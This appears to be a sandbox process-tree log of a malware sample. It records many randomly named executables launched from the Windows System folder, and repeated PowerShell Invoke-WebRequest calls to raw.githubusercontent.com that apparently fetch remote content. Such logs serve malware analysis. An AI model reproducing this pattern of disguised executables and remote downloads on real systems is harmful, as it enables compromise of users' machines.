2⤵
PID:4872

C:\Windows\System\QQTXsZw.exe
C:\Windows\System\QQTXsZw.exe
2⤵
PID:4864

C:\Windows\System\gOyUseh.exe
C:\Windows\System\gOyUseh.exe
2⤵
PID:4856

C:\Windows\System\qczinst.exe
C:\Windows\System\qczinst.exe
2⤵
PID:4848

C:\Windows\System\lRbagxn.exe
C:\Windows\System\lRbagxn.exe
2⤵
PID:4840

C:\Windows\System\NLEFLeL.exe
C:\Windows\System\NLEFLeL.exe
2⤵
PID:5044

C:\Windows\System\gEYMUJO.exe
C:\Windows\System\gEYMUJO.exe
2⤵
PID:5036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6252

C:\Windows\System\beQrCzr.exe
C:\Windows\System\beQrCzr.exe
2⤵
PID:5028

C:\Windows\System\iARqwPo.exe
C:\Windows\System\iARqwPo.exe
2⤵
PID:5016

C:\Windows\System\KMPmoQW.exe
C:\Windows\System\KMPmoQW.exe
2⤵
PID:5008

C:\Windows\System\KVjmpPl.exe
C:\Windows\System\KVjmpPl.exe
2⤵
PID:5100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6068

C:\Windows\System\UyYCnFn.exe
C:\Windows\System\UyYCnFn.exe
2⤵
PID:5092

C:\Windows\System\XRCYxys.exe
C:\Windows\System\XRCYxys.exe
2⤵
PID:5084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6028

C:\Windows\System\SYCxsTL.exe
C:\Windows\System\SYCxsTL.exe
2⤵
PID:5076

C:\Windows\System\xFWAsTj.exe
C:\Windows\System\xFWAsTj.exe
2⤵
PID:5068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:840

C:\Windows\System\Qdoagpj.exe
C:\Windows\System\Qdoagpj.exe
2⤵
PID:5060

C:\Windows\System\gvGoTSs.exe
C:\Windows\System\gvGoTSs.exe
2⤵
PID:5052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:560

C:\Windows\System\voDrnKs.exe
C:\Windows\System\voDrnKs.exe
2⤵
PID:5000

C:\Windows\System\NZWhWit.exe
C:\Windows\System\NZWhWit.exe
2⤵
PID:4992

C:\Windows\System\GSEfkKK.exe
C:\Windows\System\GSEfkKK.exe
2⤵
PID:2844

C:\Windows\System\cMqZCPI.exe
C:\Windows\System\cMqZCPI.exe
2⤵
PID:1424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6972

C:\Windows\System\RRETswn.exe
C:\Windows\System\RRETswn.exe
2⤵
PID:5024

C:\Windows\System\TQVqqat.exe
C:\Windows\System\TQVqqat.exe
2⤵
PID:4896

C:\Windows\System\mpKgLqw.exe
C:\Windows\System\mpKgLqw.exe
2⤵
PID:2896

C:\Windows\System\mHhXdKO.exe
C:\Windows\System\mHhXdKO.exe
2⤵
PID:2016

C:\Windows\System\UvzpfqJ.exe
C:\Windows\System\UvzpfqJ.exe
2⤵
PID:2044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6916

C:\Windows\System\rcltuCl.exe
C:\Windows\System\rcltuCl.exe
2⤵
PID:2908

C:\Windows\System\ZWRsOTm.exe
C:\Windows\System\ZWRsOTm.exe
2⤵
PID:2884

C:\Windows\System\vRcTIkz.exe
C:\Windows\System\vRcTIkz.exe
2⤵
PID:4628

C:\Windows\System\lRcBquL.exe
C:\Windows\System\lRcBquL.exe
2⤵
PID:2032

C:\Windows\System\rNiTvxq.exe
C:\Windows\System\rNiTvxq.exe
2⤵
PID:2012

C:\Windows\System\EJnVEtu.exe
C:\Windows\System\EJnVEtu.exe
2⤵
PID:3984

C:\Windows\System\puoKRsQ.exe
C:\Windows\System\puoKRsQ.exe
2⤵
PID:3924

C:\Windows\System\oBjOtpe.exe
C:\Windows\System\oBjOtpe.exe
2⤵
PID:5268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7292

C:\Windows\System\gyWIWVi.exe
C:\Windows\System\gyWIWVi.exe
2⤵
PID:5260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7208

C:\Windows\System\IOonqhE.exe
C:\Windows\System\IOonqhE.exe
2⤵
PID:5252

C:\Windows\System\QlqXigo.exe
C:\Windows\System\QlqXigo.exe
2⤵
PID:5244

C:\Windows\System\HCNlLzD.exe
C:\Windows\System\HCNlLzD.exe
2⤵
PID:5236

C:\Windows\System\GNJsmFT.exe
C:\Windows\System\GNJsmFT.exe
2⤵
PID:5228

C:\Windows\System\RtUoWUn.exe
C:\Windows\System\RtUoWUn.exe
2⤵
PID:5220

C:\Windows\System\EIFJGyj.exe
C:\Windows\System\EIFJGyj.exe
2⤵
PID:5212

C:\Windows\System\VOZInBB.exe
C:\Windows\System\VOZInBB.exe
2⤵
PID:5204

C:\Windows\System\zeHWqFq.exe
C:\Windows\System\zeHWqFq.exe
2⤵
PID:5196

C:\Windows\System\lMBIayM.exe
C:\Windows\System\lMBIayM.exe
2⤵
PID:5188

C:\Windows\System\AJaCbUm.exe
C:\Windows\System\AJaCbUm.exe
2⤵
PID:5180

C:\Windows\System\eBhHhly.exe
C:\Windows\System\eBhHhly.exe
2⤵
PID:5336

C:\Windows\System\GKnjzRU.exe
C:\Windows\System\GKnjzRU.exe
2⤵
PID:5416

C:\Windows\System\EIzjtsZ.exe
C:\Windows\System\EIzjtsZ.exe
2⤵
PID:5408

C:\Windows\System\CvWZstA.exe
C:\Windows\System\CvWZstA.exe
2⤵
PID:5400

C:\Windows\System\FniuJkZ.exe
C:\Windows\System\FniuJkZ.exe
2⤵
PID:5392

C:\Windows\System\ofQcCyX.exe
C:\Windows\System\ofQcCyX.exe
2⤵
PID:5544

C:\Windows\System\zvSyHKW.exe
C:\Windows\System\zvSyHKW.exe
2⤵
PID:5536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6720

C:\Windows\System\mYAnXfu.exe
C:\Windows\System\mYAnXfu.exe
2⤵
PID:5528

C:\Windows\System\aaTEVuI.exe
C:\Windows\System\aaTEVuI.exe
2⤵
PID:5520

C:\Windows\System\GqhsqrG.exe
C:\Windows\System\GqhsqrG.exe
2⤵
PID:5512

C:\Windows\System\fBOdFLe.exe
C:\Windows\System\fBOdFLe.exe
2⤵
PID:5504

C:\Windows\System\yMRraWp.exe
C:\Windows\System\yMRraWp.exe
2⤵
PID:5496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7320

C:\Windows\System\NIFVWpC.exe
C:\Windows\System\NIFVWpC.exe
2⤵
PID:5488

C:\Windows\System\WbkPZIm.exe
C:\Windows\System\WbkPZIm.exe
2⤵
PID:5480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6608

C:\Windows\System\fGiznSK.exe
C:\Windows\System\fGiznSK.exe
2⤵
PID:5472

C:\Windows\System\RaqfnFw.exe
C:\Windows\System\RaqfnFw.exe
2⤵
PID:5464

C:\Windows\System\VgGspcY.exe
C:\Windows\System\VgGspcY.exe
2⤵
PID:5452

C:\Windows\System\SRlNUuo.exe
C:\Windows\System\SRlNUuo.exe
2⤵
PID:5440

C:\Windows\System\rDJvxlO.exe
C:\Windows\System\rDJvxlO.exe
2⤵
PID:5432

C:\Windows\System\LZESnlO.exe
C:\Windows\System\LZESnlO.exe
2⤵
PID:5384

C:\Windows\System\NdXQwQJ.exe
C:\Windows\System\NdXQwQJ.exe
2⤵
PID:5376

C:\Windows\System\QctHoeF.exe
C:\Windows\System\QctHoeF.exe
2⤵
PID:5368

C:\Windows\System\FUMBfgq.exe
C:\Windows\System\FUMBfgq.exe
2⤵
PID:5360

C:\Windows\System\mMwuWib.exe
C:\Windows\System\mMwuWib.exe
2⤵
PID:5352

C:\Windows\System\NpjBCJB.exe
C:\Windows\System\NpjBCJB.exe
2⤵
PID:5344

C:\Windows\System\vlBsNRN.exe
C:\Windows\System\vlBsNRN.exe
2⤵
PID:5328

C:\Windows\System\fqHwLwp.exe
C:\Windows\System\fqHwLwp.exe
2⤵
PID:5320

C:\Windows\System\UKCkJEG.exe
C:\Windows\System\UKCkJEG.exe
2⤵
PID:5312

C:\Windows\System\xMOvOxp.exe
C:\Windows\System\xMOvOxp.exe
2⤵
PID:5304

C:\Windows\System\mBKPhth.exe
C:\Windows\System\mBKPhth.exe
2⤵
PID:5296

C:\Windows\System\CqHwzHs.exe
C:\Windows\System\CqHwzHs.exe
2⤵
PID:5608

C:\Windows\System\XxJLwuJ.exe
C:\Windows\System\XxJLwuJ.exe
2⤵
PID:5600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7620

C:\Windows\System\GMPhrIR.exe
C:\Windows\System\GMPhrIR.exe
2⤵
PID:5592

C:\Windows\System\DzjpsvC.exe
C:\Windows\System\DzjpsvC.exe
2⤵
PID:5584

C:\Windows\System\eIgrmTV.exe
C:\Windows\System\eIgrmTV.exe
2⤵
PID:5616

C:\Windows\System\ZhalhyK.exe
C:\Windows\System\ZhalhyK.exe
2⤵
PID:5704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11740

C:\Windows\System\EkDVSUE.exe
C:\Windows\System\EkDVSUE.exe
2⤵
PID:5696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11484

C:\Windows\System\ZbzuPyO.exe
C:\Windows\System\ZbzuPyO.exe
2⤵
PID:5688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11724

C:\Windows\System\BrBGhDk.exe
C:\Windows\System\BrBGhDk.exe
2⤵
PID:5680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11492

C:\Windows\System\tuvWVSu.exe
C:\Windows\System\tuvWVSu.exe
2⤵
PID:5672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11780

C:\Windows\System\OdRSAbZ.exe
C:\Windows\System\OdRSAbZ.exe
2⤵
PID:5664

C:\Windows\System\bewQive.exe
C:\Windows\System\bewQive.exe
2⤵
PID:5656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11032

C:\Windows\System\SiLiHBV.exe
C:\Windows\System\SiLiHBV.exe
2⤵
PID:5648

C:\Windows\System\beQtqyV.exe
C:\Windows\System\beQtqyV.exe
2⤵
PID:5640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11732

C:\Windows\System\WXnArAD.exe
C:\Windows\System\WXnArAD.exe
2⤵
PID:5632

C:\Windows\System\nnXcJOc.exe
C:\Windows\System\nnXcJOc.exe
2⤵
PID:5752

C:\Windows\System\bqzmeWz.exe
C:\Windows\System\bqzmeWz.exe
2⤵
PID:5792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6940

C:\Windows\System\pPtchlg.exe
C:\Windows\System\pPtchlg.exe
2⤵
PID:5784

C:\Windows\System\QngQQHw.exe
C:\Windows\System\QngQQHw.exe
2⤵
PID:5776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6868

C:\Windows\System\PuHzfba.exe
C:\Windows\System\PuHzfba.exe
2⤵
PID:5768

C:\Windows\System\FsuwgAl.exe
C:\Windows\System\FsuwgAl.exe
2⤵
PID:5760

C:\Windows\System\HOlvFcN.exe
C:\Windows\System\HOlvFcN.exe
2⤵
PID:5744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11500

C:\Windows\System\sSQRsJA.exe
C:\Windows\System\sSQRsJA.exe
2⤵
PID:5736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6824

C:\Windows\System\WdjpQIE.exe
C:\Windows\System\WdjpQIE.exe
2⤵
PID:5624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:8456

C:\Windows\System\IzKyUoE.exe
C:\Windows\System\IzKyUoE.exe
2⤵
PID:5948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:6956

C:\Windows\System\OqXEgOo.exe
C:\Windows\System\OqXEgOo.exe
2⤵
PID:5940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11748

C:\Windows\System\NPbQfyD.exe
C:\Windows\System\NPbQfyD.exe
2⤵
PID:6048

C:\Windows\System\YvPSwKT.exe
C:\Windows\System\YvPSwKT.exe
2⤵
PID:5984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7000

C:\Windows\System\yDKtbdI.exe
C:\Windows\System\yDKtbdI.exe
2⤵
PID:5712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11364

C:\Windows\System\FWkfKxN.exe
C:\Windows\System\FWkfKxN.exe
2⤵
PID:5556

C:\Windows\System\hvmySwg.exe
C:\Windows\System\hvmySwg.exe
2⤵
PID:4972

C:\Windows\System\hsyUJkv.exe
C:\Windows\System\hsyUJkv.exe
2⤵
PID:5128

C:\Windows\System\UxRuCzV.exe
C:\Windows\System\UxRuCzV.exe
2⤵
PID:5112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11268

C:\Windows\System\GhlqOIh.exe
C:\Windows\System\GhlqOIh.exe
2⤵
PID:6140

C:\Windows\System\BaDmDWZ.exe
C:\Windows\System\BaDmDWZ.exe
2⤵
PID:6132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11088

C:\Windows\System\pOedEVZ.exe
C:\Windows\System\pOedEVZ.exe
2⤵
PID:5872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11324

C:\Windows\System\bPMxITX.exe
C:\Windows\System\bPMxITX.exe
2⤵
PID:5868

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:10788

C:\Windows\System\kebEKIN.exe
C:\Windows\System\kebEKIN.exe
2⤵
PID:5816

C:\Windows\System\ovkABBc.exe
C:\Windows\System\ovkABBc.exe
2⤵
PID:6164

C:\Windows\System\QgEDGmq.exe
C:\Windows\System\QgEDGmq.exe
2⤵
PID:6156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11380

C:\Windows\System\rrOweIM.exe
C:\Windows\System\rrOweIM.exe
2⤵
PID:6148

C:\Windows\System\JirtteX.exe
C:\Windows\System\JirtteX.exe
2⤵
PID:2172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11388

C:\Windows\System\LRYNSLx.exe
C:\Windows\System\LRYNSLx.exe
2⤵
PID:2324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7248

C:\Windows\System\SWOmwrH.exe
C:\Windows\System\SWOmwrH.exe
2⤵
PID:2356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11348

C:\Windows\System\yTTWlEg.exe
C:\Windows\System\yTTWlEg.exe
2⤵
PID:5932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9896

C:\Windows\System\iOTchOU.exe
C:\Windows\System\iOTchOU.exe
2⤵
PID:5980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11300

C:\Windows\System\cccDXVt.exe
C:\Windows\System\cccDXVt.exe
2⤵
PID:5916

C:\Windows\System\PXJlSxY.exe
C:\Windows\System\PXJlSxY.exe
2⤵
PID:5888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11316

C:\Windows\System\WTGCxIm.exe
C:\Windows\System\WTGCxIm.exe
2⤵
PID:5880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9912

C:\Windows\System\XpSfTZQ.exe
C:\Windows\System\XpSfTZQ.exe
2⤵
PID:5852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9920

C:\Windows\System\OvQazFY.exe
C:\Windows\System\OvQazFY.exe
2⤵
PID:6092

C:\Windows\System\AJDLTjc.exe
C:\Windows\System\AJDLTjc.exe
2⤵
PID:6084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:10888

C:\Windows\System\QndOkFv.exe
C:\Windows\System\QndOkFv.exe
2⤵
PID:6076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7024

C:\Windows\System\jyKoosP.exe
C:\Windows\System\jyKoosP.exe
2⤵
PID:6060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7008

C:\Windows\System\DOmkdQO.exe
C:\Windows\System\DOmkdQO.exe
2⤵
PID:6280

C:\Windows\System\WBpEvSI.exe
C:\Windows\System\WBpEvSI.exe
2⤵
PID:6340

C:\Windows\System\yXLJRkK.exe
C:\Windows\System\yXLJRkK.exe
2⤵
PID:6484

C:\Windows\System\ZDrpzBX.exe
C:\Windows\System\ZDrpzBX.exe
2⤵
PID:6476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11428

C:\Windows\System\VwuCavk.exe
C:\Windows\System\VwuCavk.exe
2⤵
PID:6468

C:\Windows\System\lwULLoo.exe
C:\Windows\System\lwULLoo.exe
2⤵
PID:6460

C:\Windows\System\thykvKy.exe
C:\Windows\System\thykvKy.exe
2⤵
PID:6452

C:\Windows\System\sIedSjH.exe
C:\Windows\System\sIedSjH.exe
2⤵
PID:6500

C:\Windows\System\pepwREn.exe
C:\Windows\System\pepwREn.exe
2⤵
PID:6436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:7700

C:\Windows\System\ghfjZvk.exe
C:\Windows\System\ghfjZvk.exe
2⤵
PID:6428

C:\Windows\System\ZvypIRj.exe
C:\Windows\System\ZvypIRj.exe
2⤵
PID:6420

C:\Windows\System\rOuDFTW.exe
C:\Windows\System\rOuDFTW.exe
2⤵
PID:6412

C:\Windows\System\npgUKqz.exe
C:\Windows\System\npgUKqz.exe
2⤵
PID:6404

C:\Windows\System\HPlnxMY.exe
C:\Windows\System\HPlnxMY.exe
2⤵
PID:6396

C:\Windows\System\upjREVR.exe
C:\Windows\System\upjREVR.exe
2⤵
PID:6388

C:\Windows\System\blRwEWe.exe
C:\Windows\System\blRwEWe.exe
2⤵
PID:6380

C:\Windows\System\wVyjcyr.exe
C:\Windows\System\wVyjcyr.exe
2⤵
PID:6372

C:\Windows\System\OTycXDa.exe
C:\Windows\System\OTycXDa.exe
2⤵
PID:6364

C:\Windows\System\uFYsttg.exe
C:\Windows\System\uFYsttg.exe
2⤵
PID:6356

C:\Windows\System\tGOzpaw.exe
C:\Windows\System\tGOzpaw.exe
2⤵
PID:6348

C:\Windows\System\vgEuTQl.exe
C:\Windows\System\vgEuTQl.exe
2⤵
PID:6332

C:\Windows\System\avquWun.exe
C:\Windows\System\avquWun.exe
2⤵
PID:6320

C:\Windows\System\WlOTXSy.exe
C:\Windows\System\WlOTXSy.exe
2⤵
PID:6312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11444

C:\Windows\System\BAMRvgr.exe
C:\Windows\System\BAMRvgr.exe
2⤵
PID:6304

C:\Windows\System\IsOThXm.exe
C:\Windows\System\IsOThXm.exe
2⤵
PID:6296

C:\Windows\System\PaoPgjB.exe
C:\Windows\System\PaoPgjB.exe
2⤵
PID:6288

C:\Windows\System\SmiLcJu.exe
C:\Windows\System\SmiLcJu.exe
2⤵
PID:6272

C:\Windows\System\tqhkGDe.exe
C:\Windows\System\tqhkGDe.exe
2⤵
PID:6264

C:\Windows\System\jnRrlaA.exe
C:\Windows\System\jnRrlaA.exe
2⤵
PID:6244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11420

C:\Windows\System\qhRElrC.exe
C:\Windows\System\qhRElrC.exe
2⤵
PID:6236

C:\Windows\System\JpmPKuh.exe
C:\Windows\System\JpmPKuh.exe
2⤵
PID:6228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11412

C:\Windows\System\jCFxCAI.exe
C:\Windows\System\jCFxCAI.exe
2⤵
PID:6220

C:\Windows\System\ChzziAj.exe
C:\Windows\System\ChzziAj.exe
2⤵
PID:6212

C:\Windows\System\JwHUKhA.exe
C:\Windows\System\JwHUKhA.exe
2⤵
PID:6204

C:\Windows\System\yJfRXZj.exe
C:\Windows\System\yJfRXZj.exe
2⤵
PID:6196

C:\Windows\System\njpNnVv.exe
C:\Windows\System\njpNnVv.exe
2⤵
PID:6548

C:\Windows\System\gistBnF.exe
C:\Windows\System\gistBnF.exe
2⤵
PID:6580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9456

C:\Windows\System\ErkGUux.exe
C:\Windows\System\ErkGUux.exe
2⤵
PID:6616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9520

C:\Windows\System\PYInpnD.exe
C:\Windows\System\PYInpnD.exe
2⤵
PID:6600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9512

C:\Windows\System\ueXFhml.exe
C:\Windows\System\ueXFhml.exe
2⤵
PID:6592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9616

C:\Windows\System\HLMGVFh.exe
C:\Windows\System\HLMGVFh.exe
2⤵
PID:6572

C:\Windows\System\OMZkkom.exe
C:\Windows\System\OMZkkom.exe
2⤵
PID:6564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9464

C:\Windows\System\MQyHAAD.exe
C:\Windows\System\MQyHAAD.exe
2⤵
PID:6556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9640

C:\Windows\System\IkKDGvF.exe
C:\Windows\System\IkKDGvF.exe
2⤵
PID:6760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9536

C:\Windows\System\laIXsiH.exe
C:\Windows\System\laIXsiH.exe
2⤵
PID:6752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9648

C:\Windows\System\GQZkWBP.exe
C:\Windows\System\GQZkWBP.exe
2⤵
PID:6768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9656

C:\Windows\System\gsEPaGY.exe
C:\Windows\System\gsEPaGY.exe
2⤵
PID:6816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11176

C:\Windows\System\UdfVWbU.exe
C:\Windows\System\UdfVWbU.exe
2⤵
PID:6808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11756

C:\Windows\System\yxyVXbN.exe
C:\Windows\System\yxyVXbN.exe
2⤵
PID:6800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9672

C:\Windows\System\gHFPPRp.exe
C:\Windows\System\gHFPPRp.exe
2⤵
PID:6792

C:\Windows\System\MvPgyqM.exe
C:\Windows\System\MvPgyqM.exe
2⤵
PID:6784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9664

C:\Windows\System\uvmtBOu.exe
C:\Windows\System\uvmtBOu.exe
2⤵
PID:6776

C:\Windows\System\dWinUoQ.exe
C:\Windows\System\dWinUoQ.exe
2⤵
PID:6744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9544

C:\Windows\System\oSEotwQ.exe
C:\Windows\System\oSEotwQ.exe
2⤵
PID:6736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:11168

C:\Windows\System\jULcCpN.exe
C:\Windows\System\jULcCpN.exe
2⤵
PID:6728

C:\Windows\System\EVAySfq.exe
C:\Windows\System\EVAySfq.exe
2⤵
PID:6712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9504

C:\Windows\System\hrZoKGp.exe
C:\Windows\System\hrZoKGp.exe
2⤵
PID:6704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:8044

C:\Windows\System\hYhaGnv.exe
C:\Windows\System\hYhaGnv.exe
2⤵
PID:6696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9496

C:\Windows\System\cBIlrqi.exe
C:\Windows\System\cBIlrqi.exe
2⤵
PID:6688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
3⤵
PID:9696

C:\Windows\System\hyatCqL.exe
C:\Windows\System\hyatCqL.exe
2⤵
PID:6680

